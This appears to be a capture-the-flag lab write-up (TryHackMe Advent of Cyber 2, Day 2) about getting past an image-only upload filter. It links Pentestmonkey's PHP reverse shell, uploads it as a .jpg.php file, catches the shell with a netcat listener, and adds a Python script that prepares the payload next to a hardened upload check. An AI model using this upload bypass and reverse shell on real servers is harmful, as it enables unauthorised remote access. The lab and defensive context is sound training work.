TryHackMe — Advent of Cyber 2 — Day 2

Hello all,

With the notes and intro for day 2, it looks like we are dealing with file uploads, directory traversal and RCE. Let’s get into it and see if we are correct.

We are greeted with a page that tells you to use the code on the Room’s page as a GET parameter. Once we get to the new page, we have this upload section.

It seems like it will only take pictures. Going to test anyway with a few file types. But it is what it seems: only my .jpg and .png files are showing up in the file browser; everything else is rejected.

Why reinvent the wheel on something like this? Let’s use the already built-out PHP reverse shell from Pentestmonkey: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

All we need to do is change the IP and port near the top of the file to the address on our tunnel interface and whatever port we want to listen on.

Going to try adding another extension to my PHP reverse shell (.jpg) and see what happens. Side note: when working in a folder shared between Kali and Windows, remember that Windows will quarantine your ‘malicious’ files….

Alrighty, we were able to upload php-reverse-shell.jpg.php. A plain .php was refused but .jpg.php went through, so whatever the filter is checking, it is not the final extension.

Now to find where this gets uploaded.

First time’s the charm: /uploads/. So let’s get our Netcat listener up and running.

nc -nvlp 4444

Now browse to the uploaded file (/uploads/php-reverse-shell.jpg.php) so the server executes it, and we are in.

Now, since we aren’t trying to escalate privileges or go too far on this machine, let’s just navigate to the ‘/var/www/flag.txt’ file that the room page points us to. Once again, I’ll leave that last part to you. Best of luck!
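To make the bypass above concrete, here is an added example (my own code, not part of the room or of Pentestmonkey’s shell) that does the attacker-side preparation from this walkthrough in Python and then puts a guess at the weak filter next to a hardened one. The SHELL_TEMPLATE is a constructed stand-in for the two lines you edit in php-reverse-shell.php, the unanchored regex in naive_is_image is an assumption about how the room’s check behaves (it only has to accept x.jpg.php and reject x.php), and the listener address 10.8.1.2:4444 is made up.

```python
import os
import re
import secrets

# Constructed stand-in for the top of pentestmonkey's php-reverse-shell.php:
# only the two "CHANGE THIS" lines matter for this example.
SHELL_TEMPLATE = """<?php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
// ... rest of the reverse shell ...
"""


def prepare_payload(template, lhost, lport, basename="php-reverse-shell"):
    """Point the shell at our listener and give it a double extension.

    Returns (filename, body). The name ends in .php so PHP still runs it,
    but carries .jpg in front to slip past a sloppy image check.
    """
    body = re.sub(r"\$ip = '[^']*';", lambda m: f"$ip = '{lhost}';", template, count=1)
    body = re.sub(r"\$port = \d+;", lambda m: f"$port = {lport};", body, count=1)
    return f"{basename}.jpg.php", body


ALLOWED = {".jpg", ".jpeg", ".png"}
# Magic bytes for the image types we are willing to store.
MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png"}

# Constructed PNG header plus padding; not a real image, just the signature.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def naive_is_image(filename):
    """ASSUMED vulnerable check: an unanchored search for an image extension
    anywhere in the name. 'shell.php' fails, 'shell.jpg.php' passes."""
    return re.search(r"\.(jpe?g|png)", filename, re.I) is not None


def sniff_ext(data):
    """Return the extension implied by the file's first bytes, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def strict_is_image(filename, data):
    """Hardened check: only the LAST extension counts, it must be on the
    allow-list, and the bytes must actually look like that image type."""
    _, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if ext not in ALLOWED:
        return False
    if ext == ".jpeg":
        ext = ".jpg"
    return sniff_ext(data) == ext


def storage_name(data):
    """Never reuse the client's filename on disk: pick a random stem and take
    the extension from the sniffed content, so nothing can land as .php."""
    ext = sniff_ext(data)
    if ext is None:
        raise ValueError("content is not an allowed image type")
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    name, body = prepare_payload(SHELL_TEMPLATE, "10.8.1.2", 4444)
    print(name, "naive:", naive_is_image(name), "strict:", strict_is_image(name, body.encode()))
    print("real png stored as", storage_name(PNG_SAMPLE))
```

Even with the strict check in place, the upload directory should not be able to execute scripts at all (for Apache with mod_php, `php_admin_flag engine off` in the directory config, or no handler mapping for that path), because a filename check is only one layer and content-sniffing can be fooled by a polyglot file that is both a valid image and valid PHP.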

Until next time,

-3lduderino
